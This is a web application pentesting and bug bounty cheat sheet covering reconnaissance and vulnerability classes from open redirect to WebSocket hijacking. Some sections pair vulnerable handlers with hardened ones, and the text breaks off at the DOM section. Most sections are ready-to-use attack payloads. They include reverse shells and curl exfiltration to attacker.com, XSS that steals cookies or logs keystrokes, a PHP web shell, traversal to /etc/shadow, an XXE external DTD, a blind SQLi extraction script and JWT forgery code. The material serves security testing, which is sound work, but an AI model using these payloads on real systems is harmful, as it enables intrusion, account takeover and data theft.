Complete documentation for web application security testing and bug bounty hunting
- Enumeration
- WebApp Pentest
- Attack Surface Recon
- Subdomain Discovery
- Subdomain Takeover
- Port Scanning
- Content Discovery
- Parameters
- Vulnerability Scanners
- GitHub Recon
- Nuclei AI
- Shodan Dorking
- All CMS
- Open Redirect
- Authentication Vulnerabilities
- Directory Traversal
- OS Command Injection
- Business Logic Vulnerabilities
- Information Disclosure
- Access Control Vulnerabilities
- File Upload Vulnerabilities
- XXE
- XSS Cross Site Scripting
- SQLi
- JWT
- HTTP Host Header
- WebSocket
- DOM Based Vulnerabilities
- Clickjacking
- CORS
- CSRF
- SSRF
- Tools
Description: The initial phase of collecting information about the target to understand its infrastructure, technology stack, and potential attack vectors.
- Passive reconnaissance (OSINT)
- Active reconnaissance (direct interaction)
- Service identification
- Technology stack fingerprinting
# Whois lookup
whois target.com
# DNS enumeration
nslookup target.com
dig target.com ANY
# Email harvesting
theHarvester -d target.com -b all
# ASN lookup
whois -h whois.radb.net AS[NUMBER]
- Domain registration info
- DNS records (A, AAAA, MX, TXT, NS)
- Email addresses & employees
- IP ranges & ASN
- Organization structure
Description: A systematic framework for testing web application security thoroughly from every angle.
- Information Gathering - Mapping the application
- Configuration & Deployment - Identifying misconfigurations
- Identity Management - Testing authentication
- Authorization - Testing authorization
- Session Management - Testing session handling
- Input Validation - Testing injection flaws
- Error Handling - Information leakage
- Cryptography - Weak crypto implementation
- Business Logic - Logic flaws
- Client-Side - DOM, XSS, clickjacking
- Follow OWASP Testing Guide v4.2
- OWASP Top 10 checklist
- ASVS (Application Security Verification Standard)
Description: Mapping the entire attack surface to identify every entry point and potential vulnerability.
- Web Applications - Main & sub applications
- APIs - REST, GraphQL, SOAP endpoints
- Mobile Apps - Android & iOS
- Third-party Integrations - External services
- Cloud Services - S3, Azure Storage, etc.
# Asset discovery
amass enum -d target.com
# Technology detection
whatweb target.com
wappalyzer
# JavaScript analysis
subjs -i urls.txt | hakrawler
- All subdomains mapped
- All ports & services identified
- All URLs & endpoints discovered
- Technology stack documented
- Third-party services identified
Description: Finding all of the target's subdomains to widen the attack surface and locate forgotten or unmaintained assets.
# Certificate transparency
crt.sh
certspotter
# DNS aggregators
subfinder -d target.com
assetfinder -subs-only target.com
amass enum -passive -d target.com
# DNS bruteforce
puredns bruteforce wordlist.txt target.com -r resolvers.txt
# Permutation
dnsgen domains.txt | massdns -r resolvers.txt -o S
# Reverse DNS
prips 1.2.3.0/24 | hakrevdns -d target.com
# Check alive subdomains
httpx -l subdomains.txt -o alive.txt
# Screenshot
gowitness file -f alive.txt
Description: A vulnerability where a subdomain points at a service that is no longer active, allowing an attacker to claim that subdomain.
- GitHub Pages
- Heroku
- AWS S3
- Azure
- Shopify
- Tumblr
- WordPress.com
- And many more...
# Automated scanning
subjack -w subdomains.txt -t 100 -timeout 30 -o results.txt
subzy -targets subdomains.txt
# Nuclei templates
nuclei -l subdomains.txt -t subdomain-takeover/   # template directory name varies by nuclei-templates version (e.g. http/takeovers/)
- Check CNAME records
- Verify service response
- Attempt registration
- Confirm takeover
GitHub Pages: "There isn't a GitHub Pages site here"
Heroku: "No such app"
S3: "NoSuchBucket"
Azure: "404 Web Site not found"
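The first two verification steps above (CNAME check, then service response) automated as a small checker. This is an added example, not code from the original page or from any of the tools it lists: the fingerprint strings are the ones listed in this section, while the CNAME patterns and the sample DNS/HTTP records are constructed assumptions for illustration.

```python
import re

# Provider fingerprints from this section. The CNAME patterns are assumptions
# for illustration; real checkers (subjack, nuclei) ship a maintained list.
FINGERPRINTS = [
    ("GitHub Pages", r"\.github\.io$", "There isn't a GitHub Pages site here"),
    ("Heroku", r"\.herokuapp\.com$", "No such app"),
    ("AWS S3", r"\.s3(?:[.-][a-z0-9-]+)?\.amazonaws\.com$", "NoSuchBucket"),
    ("Azure", r"\.azurewebsites\.net$", "404 Web Site not found"),
]


def check_takeover(subdomain, cname, body):
    """Return (provider, reason) when `subdomain` looks claimable, else None.

    Both conditions must hold: the CNAME points at a known third-party
    service AND that service answers with its 'resource does not exist'
    string. A fingerprint alone is a common false positive (the same text
    appears on unrelated pages); a dangling CNAME whose target still serves
    content is not claimable.
    """
    if not cname:
        return None
    cname = cname.rstrip(".").lower()
    for provider, pattern, fingerprint in FINGERPRINTS:
        if re.search(pattern, cname) and fingerprint in body:
            return provider, f"{subdomain} -> CNAME {cname}: '{fingerprint}'"
    return None


def scan(records):
    """records: iterable of (subdomain, cname_or_None, http_body)."""
    return [hit for hit in (check_takeover(*r) for r in records) if hit]


# Constructed sample data standing in for dig/httpx output (not real hosts)
SAMPLE = [
    ("docs.target.com", "target-docs.github.io.", "There isn't a GitHub Pages site here"),
    ("shop.target.com", "target-shop.herokuapp.com", "<html>Welcome to the shop</html>"),
    ("static.target.com", "target-static.s3.amazonaws.com", "<Code>NoSuchBucket</Code>"),
    ("www.target.com", None, "NoSuchBucket"),
]

if __name__ == "__main__":
    for provider, reason in scan(SAMPLE):
        print(f"[{provider}] {reason}")
```

Feed it the CNAME answers from dig and the bodies from httpx. The remaining steps (registration and confirmation) stay manual: claim the resource only for targets in scope and put up a harmless proof page rather than real content.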
Description: Identifying open ports and running services to find potential entry points.
# Quick scan
nmap -F target.com
# Full TCP scan
nmap -p- target.com
# Service version detection
nmap -sV -sC target.com
# Aggressive scan
nmap -A -T4 target.com
# Mass scanning
masscan -p1-65535 1.2.3.0/24 --rate=1000   # masscan does not resolve hostnames: give it IPs or CIDR ranges
20,21 - FTP
22 - SSH
23 - Telnet
25 - SMTP
53 - DNS
80,443 - HTTP/HTTPS
3306 - MySQL
5432 - PostgreSQL
6379 - Redis
27017 - MongoDB
8080,8443 - HTTP Alternative
Description: Finding hidden directories, files, and endpoints that are not publicly linked.
# Directory bruteforce
ffuf -w wordlist.txt -u https://target.com/FUZZ
# Recursive discovery
feroxbuster -u https://target.com -w wordlist.txt
# Content discovery
dirsearch -u https://target.com -e php,html,js
# Gobuster
gobuster dir -u https://target.com -w wordlist.txt
- SecLists/Discovery/Web-Content/
- common.txt
- directory-list-2.3-medium.txt
- raft-large-files.txt
/admin, /administrator
/backup, /backups, .bak
/config, /configuration
/api, /v1, /v2
/test, /dev, /staging
/.git, /.svn, /.env
/phpinfo.php
/robots.txt, /sitemap.xml
Description: Discovering and testing the parameters an application uses to find injection points and logic flaws.
# From URLs
arjun -u https://target.com/page
# From JavaScript
getallurls target.com | grep "?"
subjs -i urls.txt
# Parameter mining
paramspider -d target.com
- GET parameters - URL query strings
- POST parameters - Form data
- JSON parameters - API requests
- XML parameters - SOAP/XML APIs
- Cookies - Session & tracking
- Headers - Custom headers
# Parameter fuzzing
ffuf -u https://target.com/?FUZZ=value -w params.txt
# Parameter pollution
param=value&param=value2
# Parameter manipulation
id=1 → id=2, id=-1, id=0, id=999999
Description: Automated tools for scanning vulnerabilities quickly and efficiently.
# Nuclei - Template based
nuclei -l urls.txt -t cves/ -t vulnerabilities/
# Nikto - Web server scanner
nikto -h target.com
# WPScan - WordPress scanner
wpscan --url target.com --api-token YOUR_TOKEN
# Nessus - Comprehensive scanner
# (GUI-based)
# Acunetix - Commercial scanner
# (GUI-based)
# Nuclei custom templates
nuclei -l urls.txt -t custom-template.yaml
# Jaeles scanning
jaeles scan -u https://target.com
Description: Finding sensitive information and credentials leaked in GitHub repositories.
# Organization repos
org:target
# Code search
target.com password
target.com api_key
target.com secret_key
target.com access_token
# Specific files
filename:.env target.com
filename:config.php target.com
extension:pem target.com
# GitDorker
python3 GitDorker.py -tf token.txt -d dorks.txt -o results.txt
# Gitrob
gitrob -github-access-token TOKEN org_name
# TruffleHog
trufflehog git https://github.com/target/repo
- API keys & tokens
- Database credentials
- AWS keys
- Private keys
- Configuration files
- Internal URLs
- Employee information
Description: Using Nuclei templates together with AI-assisted scanning for smarter vulnerability detection.
# Install
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest   # v3 is the current major version; older guides show .../nuclei/v2/...
# Update templates
nuclei -update-templates
# Basic scan
nuclei -u https://target.com
# Template-based scan
nuclei -l urls.txt -t cves/ -t vulnerabilities/
# Severity filtering
nuclei -l urls.txt -severity critical,high
- CVEs
- Vulnerabilities
- Exposures
- Misconfigurations
- Technologies
- Fuzzing
- Workflows
id: custom-check

info:
  name: Custom Vulnerability Check
  severity: high

http:                      # nuclei v3 key; older v2 templates use "requests:"
  - method: GET
    path:
      - "{{BaseURL}}/vulnerable-endpoint"
    matchers:
      - type: word
        words:
          - "vulnerability indicator"
Description: Using the Shodan search engine to find exposed services and vulnerable systems.
# By organization
org:"Target Inc"
# By hostname
hostname:target.com
# By technology
product:"Apache httpd"
# Webcams
title:"IP Webcam"
# Databases
port:3306 product:MySQL
port:27017 product:MongoDB
# Default credentials
authentication disabled
# Specific CVEs
vuln:CVE-2021-44228
# Search
shodan search "org:Target"
# Host information
shodan host 1.2.3.4
# Download results
shodan download results "hostname:target.com"
# Using multiple free accounts (check Shodan's terms of service first)
# Rotate API keys
# Use shodan-python library with proxy
# Alternative: Censys
censys search "target.com"
Description: Testing Content Management Systems (WordPress, Joomla, Drupal, etc.).
# WPScan
wpscan --url target.com --enumerate u,p,t --api-token TOKEN
# Common vulns
/wp-admin/ - Admin panel
/wp-content/uploads/ - File upload
/xmlrpc.php - XML-RPC
/wp-json/ - REST API
# JoomScan
joomscan -u target.com
# Common paths
/administrator/ - Admin panel
/configuration.php - Config file
# Droopescan
droopescan scan drupal -u target.com
# Common vulns
Drupalgeddon 2 (CVE-2018-7600)
- Magento - Magento Scanner
- Shopify - Shopify specific tests
- Ghost - Check version & vulns
- Strapi - API vulnerabilities
Description: A vulnerability that lets an attacker redirect users to an external malicious site via a trusted domain.
?url=
?redirect=
?next=
?return=
?continue=
?dest=
?redirect_uri=
?callback=
?jump=
?target=
# Basic
https://target.com/redirect?url=https://evil.com
# Double encoding
https://target.com/redirect?url=https%253A%252F%252Fevil.com
# Protocol handlers
javascript:alert(1)
data:text/html,<script>alert(1)</script>
# Bypass filters
//evil.com
///evil.com
////evil.com
https:evil.com
https:/evil.com
# Whitelisting bypass
https://target.com@evil.com
https://evil.com.target.com
https://target.com.evil.com
- Phishing attacks
- OAuth token theft
- Session hijacking
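Why the bypass payloads above work, shown against two redirect validators. This is an added example, not code from the original page: `naive_is_safe` is the string-matching filter those payloads are designed for, `hardened_is_safe` parses first and compares the hostname exactly. The trusted host name and the two legitimate destinations are constructed assumptions.

```python
from urllib.parse import urlparse

TRUSTED_HOST = "target.com"

# Constructed sample: two legitimate destinations plus the bypass payloads from this section
LEGIT = ["https://target.com/account", "/dashboard"]
PAYLOADS = LEGIT + [
    "https://evil.com",
    "//evil.com",
    "///evil.com",
    "https:evil.com",
    "https:/evil.com",
    "https://target.com@evil.com",
    "https://target.com.evil.com",
    "https://evil.com/?next=target.com",
    "javascript:alert(1)",
    "/\\evil.com",          # browsers treat '/\' like '//'
]


def naive_is_safe(url):
    """String matching on the raw value: the filter the payloads above defeat."""
    return url.startswith("/") or url.startswith("https://" + TRUSTED_HOST) or TRUSTED_HOST in url


def hardened_is_safe(url):
    """Parse, then compare the hostname exactly and pin the scheme.

    Relative targets are accepted only as a single-slash path with no
    backslash; '//host' and '/\\host' are scheme-relative URLs to a browser.
    """
    p = urlparse(url)
    if p.scheme == "" and p.netloc == "":
        return url.startswith("/") and not url.startswith("//") and "\\" not in url
    if p.scheme not in ("http", "https"):
        return False
    return p.hostname == TRUSTED_HOST


def bypasses(check):
    """Attacker-controlled destinations that `check` wrongly accepts."""
    return [u for u in PAYLOADS if u not in LEGIT and check(u)]


if __name__ == "__main__":
    print("naive accepts:", bypasses(naive_is_safe))
    print("hardened accepts:", bypasses(hardened_is_safe))
```

The `https://target.com@evil.com` case is the one to remember: the prefix check passes because the string really does start with the trusted host, but a URL parser (and the browser) treats everything before `@` as userinfo and sends the user to evil.com.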
Description: Weaknesses in authentication mechanisms that allow unauthorized access.
- Weak Passwords - Brute force
- Default Credentials - admin/admin
- Password Reset Flaws - Token manipulation
- 2FA Bypass - Response manipulation
- Session Fixation - Session manipulation
- Credential Stuffing - Leaked credentials
[ ] Brute force protection
[ ] Password complexity
[ ] Account lockout mechanism
[ ] Password reset security
[ ] 2FA implementation
[ ] Session management
[ ] OAuth/SSO vulnerabilities
[ ] Remember me functionality
# Brute force
hydra -L users.txt -P passwords.txt target.com http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect"
# (the path, field names and failure string after F= are placeholders; take them from the target's login form)
# 2FA bypass
- Response manipulation
- Code reuse
- Rate limit bypass
- Backup codes
# Password reset
- Token prediction
- Token not expiring
- No rate limiting
Description: A vulnerability that lets an attacker access files and directories outside the web root.
../
../../
../../../etc/passwd
....//....//....//etc/passwd
..%2f..%2f..%2fetc%2fpasswd
%2e%2e%2f
%2e%2e/
..%2f
%2e%2e%5c
%252e%252e%252f
%252e%252e/
..%252f
/etc/passwd
/etc/shadow
C:\Windows\System32\config\SAM
C:\Windows\win.ini
/proc/self/environ
/var/log/apache2/access.log
# Null byte
../../etc/passwd%00
# Nested traversal
....//....//etc/passwd
# Absolute path
/etc/passwd
# Windows
..\..\..\..\windows\system32\drivers\etc\hosts
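The payloads above against a typical "strip ../" filter and against a handler that decodes, normalises and then proves the path stays under the document root. This is an added example, not code from the original page; the base directory `/var/www/files` and the file names are constructed assumptions, and no files are actually opened.

```python
import posixpath
from urllib.parse import unquote

BASE = "/var/www/files"   # assumed document root for the download handler


def decode_fully(value, rounds=3):
    """Undo repeated URL encoding so %2e%2e%2f and %252e%252e%252f both become ../"""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def vulnerable_resolve(user_path):
    """Strips '../' once, then decodes: the order that ....// and %2e%2e%2f exploit.
    normpath stands in for what the filesystem does with the '..' components."""
    filtered = user_path.replace("../", "")
    return posixpath.normpath(posixpath.join(BASE, unquote(filtered)))


def hardened_resolve(user_path):
    """Decode first, normalise, then prove the result is inside BASE."""
    decoded = decode_fully(user_path).replace("\\", "/")
    if "\x00" in decoded:
        raise ValueError("null byte in path")
    # join() discards BASE when the second part is absolute, so strip leading '/'
    candidate = posixpath.normpath(posixpath.join(BASE, decoded.lstrip("/")))
    # commonpath, not startswith: '/var/www/files2/x' would pass a prefix check
    if posixpath.commonpath([BASE, candidate]) != BASE:
        raise ValueError(f"traversal blocked: {user_path!r}")
    return candidate


# Payloads from this section (constructed input; no files are touched)
PAYLOADS = [
    "reports/2024.pdf",
    "../../../etc/passwd",
    "....//....//....//etc/passwd",
    "..%2f..%2f..%2fetc%2fpasswd",
    "%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd",
    "/etc/passwd",
    "../../etc/passwd%00.pdf",
]


def compare():
    """Map each payload to (what the vulnerable handler opens, what the hardened one does)."""
    out = {}
    for p in PAYLOADS:
        try:
            safe = hardened_resolve(p)
        except ValueError as e:
            safe = f"BLOCKED ({e})"
        out[p] = (vulnerable_resolve(p), safe)
    return out


if __name__ == "__main__":
    for p, (vuln, safe) in compare().items():
        print(f"{p!r:62} vulnerable -> {vuln:28} hardened -> {safe}")
```

Note the absolute-path case: `posixpath.join(BASE, "/etc/passwd")` silently returns `/etc/passwd`, which is why the hardened version strips leading slashes before joining. In production, run `os.path.realpath` on the final path as well so symlinks under the document root cannot point outside it; `normpath` is used here only so the example runs without the files existing.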
Description: A vulnerability that lets an attacker execute arbitrary OS commands on the server.
- User input passed to system()
- Shell commands
- Subprocess execution
- External program calls
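The difference between the vulnerable pattern (user input spliced into a shell command line) and the hardened one (argv list, no shell, plus an allowlist) on the payload shapes listed below. This is an added example, not code from the original page; `echo` stands in for the nslookup/ping binary a real lookup page would call so that it runs anywhere, and the hostname pattern is an assumption.

```python
import re
import subprocess

# Allowlist of what a hostname may look like (assumed); not a blocklist of metacharacters
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")


def lookup_vulnerable(host):
    """User input spliced into a shell command line: ';', '|', '&&', '`' and
    '$()' from the payload list below are interpreted by /bin/sh."""
    result = subprocess.run("echo resolving " + host, shell=True,
                            capture_output=True, text=True)
    return result.stdout.splitlines()


def lookup_hardened(host):
    """No shell: with an argv list the input is exactly one argument and is
    never parsed, and the allowlist rejects anything that is not a hostname."""
    if not HOSTNAME_RE.match(host):
        raise ValueError(f"rejected input: {host!r}")
    result = subprocess.run(["echo", "resolving", host],
                            capture_output=True, text=True)
    return result.stdout.splitlines()


INJECTION = "target.com; echo INJECTED"   # constructed payload

if __name__ == "__main__":
    print("vulnerable:", lookup_vulnerable(INJECTION))
    try:
        print("hardened:", lookup_hardened(INJECTION))
    except ValueError as e:
        print("hardened:", e)
```

Dropping the shell removes command chaining, but an argument that starts with `-` can still be read as an option by the called program (`ping -c 10 ...` style argument injection), which is why the allowlist is kept even in the hardened version.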
# Unix/Linux
; ls
| ls
|| ls
& ls
&& ls
`ls`
$(ls)
# Blind injection
; sleep 10
; ping -c 10 attacker.com
# Windows
& dir
&& dir
| dir
|| dir
# Information gathering
whoami
id
uname -a
cat /etc/passwd
ifconfig
# Reverse shell
bash -i >& /dev/tcp/attacker.com/4444 0>&1
nc -e /bin/sh attacker.com 4444
# Time-based detection
; sleep 10 &
# Out-of-band detection
; nslookup $(whoami).attacker.com &
# Blind exploitation
; curl http://attacker.com/$(whoami) &
Description: Flaws in the design and implementation of business logic that an attacker can abuse.
- Price Manipulation - Negative values, tampering
- Race Conditions - Concurrent requests
- Workflow Bypass - Skip payment steps
- Insufficient Process Validation - Missing checks
- Excessive Trust - Client-side validation only
# Price manipulation
POST /checkout
amount=-100
# Race condition
# Multiple parallel requests to redeem coupon
# Workflow bypass
# Direct access to /order-complete
# Parameter tampering
user_id=1 → user_id=2
role=user → role=admin
- Map business flows
- Identify critical actions
- Test boundary conditions
- Manipulate parameters
- Test state transitions
- Race condition testing
Description: Unintentional exposure of sensitive information that can help an attacker.
- Error Messages - Stack traces, debug info
- Comments in Source - Credentials, internal IPs
- Backup Files - .bak, .old, ~
- Version Information - Software versions
- Directory Listings - Autoindex enabled
- API Responses - Verbose errors
# Error messages
500 Internal Server Error with stack trace
# Source code comments
<!-- Admin password: secretpass -->
# Backup files
/config.php.bak
/database.sql.old
/.git/
/.env
# Headers
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/7.4.3
# Robots.txt
Disallow: /admin-secret/
# Dirsearch
dirsearch -u target.com -e bak,old,txt,zip
# Wayback Machine
waybackurls target.com | grep -E "\.bak|\.old|\.zip"
Description: Weaknesses in authorization enforcement that allow unauthorized actions.
- Vertical Privilege Escalation - User → Admin
- Horizontal Privilege Escalation - User A → User B
- IDOR - Insecure Direct Object Reference
- Missing Function Level Access Control
- Forced Browsing
# User profile
/user/profile?id=123 → id=124
# Order details
/order?order_id=1000 → order_id=1001
# File access
/download?file=user123.pdf → file=user124.pdf
# API endpoints
GET /api/users/123 → /api/users/124
[ ] Test with different user roles
[ ] Manipulate object references
[ ] Test direct URL access
[ ] Check API endpoints authorization
[ ] Test parameter manipulation
[ ] Cross-account testing
Description: A vulnerability that lets an attacker upload malicious files to the server.
- Unrestricted Upload - No filtering
- Extension Bypass - .php5, .phtml
- Content-Type Bypass - Modify header
- Double Extension - file.php.jpg
- Null Byte Injection - file.php%00.jpg
# Web shells
.php, .jsp, .asp, .aspx
# Server-side scripts
.py, .pl, .rb
# Client-side
.html, .svg (XSS)
# Archives
.zip, .tar (path traversal)
# Extension bypass
shell.php5
shell.phtml
shell.php.jpg
# Content-Type manipulation
Content-Type: image/jpeg
(but contains PHP code)
# Magic bytes
Add GIF89a to beginning of PHP file
# Case manipulation
shell.PhP
shell.pHp
// Simple web shell
<?php system($_GET['cmd']); ?>
// Upload via cURL
curl -F "file=@shell.php" https://target.com/upload
Description: XML External Entity injection, a vulnerability that lets an attacker read files, perform SSRF, and cause denial of service.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>
<data>&xxe;</data>
</root>
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">%xxe;]>
<root></root>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://internal-server/admin">]>
<root>&xxe;</root>
# Local file read
file:///etc/passwd
file:///c:/windows/win.ini
# SSRF
http://localhost:8080/admin
http://169.254.169.254/latest/meta-data/
# PHP wrappers
php://filter/convert.base64-encode/resource=/etc/passwd
Description: An injection vulnerability that lets an attacker execute malicious scripts in the victim's browser.
- Reflected XSS - Payload in the URL/input
- Stored XSS - Saved in the database
- DOM-based XSS - Vulnerable client-side script
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<iframe src="javascript:alert(1)">
<body onload=alert(1)>
# Case manipulation
<ScRiPt>alert(1)</sCrIpT>
# Encoding
<script>alert(1)</script>
%3Cscript%3Ealert(1)%3C/script%3E
# Alternative tags
<img src=x onerror=alert(1)>
<svg/onload=alert(1)>
# Event handlers
<input autofocus onfocus=alert(1)>
<select onfocus=alert(1) autofocus>
// Cookie stealing
<script>
fetch('https://attacker.com/?c='+document.cookie)
</script>
// Keylogger
<script>
document.onkeypress=function(e){
fetch('https://attacker.com/?k='+e.key)
}
</script>
// BeEF hook
<script src="http://attacker.com/hook.js"></script>
Description: SQL Injection, a vulnerability that lets an attacker manipulate database queries.
- Error-based - Error messages reveal data
- Union-based - UNION SELECT for data extraction
- Blind SQLi - Boolean/Time-based
- Out-of-band - DNS/HTTP exfiltration
# Simple tests
' OR '1'='1
' OR 1=1--
" OR "1"="1
') OR ('1'='1
# Error detection
'
"
`
')
")
`)
# Find column count (on MySQL the comment needs a trailing space, '-- ', or use '#')
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3-- (error = 2 columns)
# Union injection
' UNION SELECT NULL,NULL--
' UNION SELECT 'a','b'--
' UNION SELECT username,password FROM users--
# Boolean-based
' AND 1=1-- (True)
' AND 1=2-- (False)
# Time-based
' AND SLEEP(5)--
' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
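Boolean-based blind extraction carried through end to end: the one-character-at-a-time substring oracle from this section, automated with a binary search on the character's code point so each character costs about seven requests instead of one per candidate. This is an added example, not code from the original page; the backend is a constructed in-memory SQLite database with a `products` and a `users` table, and `vulnerable_page` stands in for the injectable HTTP endpoint.

```python
import sqlite3

# Constructed stand-in for the target's database (SQLite in memory)
db = sqlite3.connect(":memory:")
db.executescript("""
    CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT);
    INSERT INTO products VALUES (1, 'widget');
    CREATE TABLE users(username TEXT, password TEXT);
    INSERT INTO users VALUES ('admin', 'Summer2024!');
""")
REQUESTS = [0]   # counts simulated HTTP requests


def vulnerable_page(product_id):
    """The injectable endpoint: /page?id=<product_id> concatenated into SQL.
    The boolean 'oracle' is whether a product row comes back; an SQL error
    looks like 'no row' too, as a generic error page would."""
    REQUESTS[0] += 1
    sql = f"SELECT name FROM products WHERE id = '{product_id}'"
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def oracle(condition):
    """Ask one yes/no question: id=1' AND (<condition>)--"""
    return vulnerable_page(f"1' AND ({condition})--")


def extract(subquery, max_len=64):
    """Blind extraction by binary search on each character's code point.
    unicode()/substr() are SQLite names; MySQL uses ORD()/SUBSTRING(). On MySQL
    a plain '=' compare on text is case-insensitive, which is another reason
    to compare code points rather than characters."""
    value = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr(({subquery}),{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:   # substr past the end is '' -> unicode('') is NULL -> every comparison false
            break
        value += chr(lo)
    return value


if __name__ == "__main__":
    print("1=1 ->", oracle("1=1"), " 1=2 ->", oracle("1=2"))
    print("password:", extract("SELECT password FROM users LIMIT 1"), "requests:", REQUESTS[0])
```

The request counter is the practical point: against a rate-limited target, a linear scan of 62 candidates per character is the difference between a finding and a lockout, and sqlmap's boolean technique applies the same bisection.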
# Substring extraction
' AND SUBSTRING((SELECT password FROM users LIMIT 1),1,1)='a'--
# SQLMap
sqlmap -u "http://target.com/page?id=1" --dbs
sqlmap -u "http://target.com/page?id=1" -D database --tables
sqlmap -u "http://target.com/page?id=1" -D database -T users --dump
Description: JSON Web Token vulnerabilities that can lead to authentication bypass and privilege escalation.
header.payload.signature
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.
eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.
SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
- None Algorithm - alg: none
- Weak Secret - Brute force HMAC
- Algorithm Confusion - RS256 → HS256
- Kid Parameter Injection - Path traversal
- JKU/X5U Header Injection - SSRF
# None algorithm
{
"alg": "none",
"typ": "JWT"
}
# Weak secret brute force
hashcat -m 16500 jwt.txt wordlist.txt
# Algorithm confusion
# Change alg from RS256 to HS256
# Sign with public key as secret
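The alg:none and weak-secret attacks above, worked against a verifier that trusts the token's own `alg` header and against one that pins the algorithm. This is an added example, not code from the original page or from jwt_tool: it uses only the standard library, the server secret and the wordlist are constructed, and the RS256→HS256 confusion is described in the comments rather than implemented because RSA needs a third-party library (the dispatch bug it exploits is the same one shown here for alg:none).

```python
import base64
import hashlib
import hmac
import json

# Constructed server secret and wordlist; a real test uses hashcat -m 16500 with a large list
SERVER_SECRET = b"secret123"
WORDLIST = ["password", "admin", "secret123", "changeme"]


def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(segment):
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def encode_jwt(header, payload, secret=None):
    """HS256 when a secret is given; alg:none forgery (empty signature) when None."""
    signing_input = b64url(json.dumps(header).encode()) + "." + b64url(json.dumps(payload).encode())
    if secret is None:
        return signing_input + "."
    return signing_input + "." + b64url(hmac.new(secret, signing_input.encode(), hashlib.sha256).digest())


def verify_vulnerable(token, secret):
    """Dispatches on the token's own 'alg' header: the root cause of the alg:none
    bypass and of RS256->HS256 confusion (same bug; there the configured RSA
    public key ends up being used as the HMAC secret)."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") == "none":
        return json.loads(b64url_decode(p))
    if header.get("alg") == "HS256":
        mac = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(mac, b64url_decode(s)):
            return json.loads(b64url_decode(p))
    return None


def verify_hardened(token, secret, expected_alg="HS256"):
    """Pins the algorithm server-side and always checks a signature."""
    h, p, s = token.split(".")
    if json.loads(b64url_decode(h)).get("alg") != expected_alg:
        return None
    mac = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return json.loads(b64url_decode(p)) if hmac.compare_digest(mac, b64url_decode(s)) else None


def crack_secret(token, wordlist):
    """Offline HS256 brute force: recompute the MAC per candidate; no requests hit the target."""
    h, p, s = token.split(".")
    target = b64url_decode(s)
    for word in wordlist:
        if hmac.compare_digest(hmac.new(word.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest(), target):
            return word
    return None


HS256 = {"alg": "HS256", "typ": "JWT"}
NONE = {"alg": "none", "typ": "JWT"}
user_token = encode_jwt(HS256, {"sub": "1001", "role": "user"}, SERVER_SECRET)   # issued by the app
none_token = encode_jwt(NONE, {"sub": "1001", "role": "admin"})                  # forged, no secret needed

if __name__ == "__main__":
    print("alg:none  vulnerable ->", verify_vulnerable(none_token, SERVER_SECRET),
          " hardened ->", verify_hardened(none_token, SERVER_SECRET))
    secret = crack_secret(user_token, WORDLIST)
    forged = encode_jwt(HS256, {"sub": "1001", "role": "admin"}, secret.encode())
    print("cracked secret:", secret, " forged admin token accepted by hardened verifier ->",
          verify_hardened(forged, SERVER_SECRET))
```

Pinning the algorithm closes alg:none and algorithm confusion but not the weak-secret case: a token signed with the cracked secret is a valid token, so the only fix there is a long random secret (or an asymmetric algorithm with the private key kept off the verifier).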
# Kid injection
"kid": "../../dev/null"
# JKU injection
"jku": "http://attacker.com/jwks.json"
# JWT Tool
python3 jwt_tool.py TOKEN
# Decode
jwt.io
Description: Vulnerabilities arising from improper validation of the HTTP Host header.
- Password Reset Poisoning - Malicious reset link
- Web Cache Poisoning - Inject malicious content
- SSRF - Access internal resources
- Virtual Host Routing Bypass - Access restricted vhosts
# Basic injection
Host: evil.com
# Port injection
Host: target.com:evil.com
# Absolute URL
GET https://target.com/ HTTP/1.1
Host: evil.com
# Duplicate headers
Host: target.com
Host: evil.com
# X-Forwarded-Host
X-Forwarded-Host: evil.com
# X-Host
X-Host: evil.com
POST /forgot-password HTTP/1.1
Host: evil.com
Content-Type: application/x-www-form-urlencoded
email=victim@target.com
# The reset link will be generated as: http://evil.com/reset?token=...
Description: Testing WebSocket connections for security vulnerabilities.
- Cross-Site WebSocket Hijacking (CSWSH)
- Missing Authentication
- Injection Attacks
- Message Tampering
// Connect to WebSocket
const ws = new WebSocket('wss://target.com/ws');
// Test CSWSH
ws.onopen = function() {
ws.send('sensitive_command');
};
ws.onmessage = function(event) {
console.log('Received:', event.data);
};
<!-- Attacker page -->
<script>
var ws = new WebSocket('wss://target.com/ws');
ws.onopen = function() {
ws.send('{"action":"get_sensitive_data"}');
};
ws.onmessage = function(e) {
fetch('https://attacker.com/?data=' + e.data);
};
</script>
# Burp Suite WebSocket support
# OWASP ZAP WebSocket testing
# wscat - WebSocket client
wscat -c wss://target.com/ws
Description: Client-side vulnerabilities that occur within the Document Object Model (DOM).
- DOM XSS - JavaScript execution
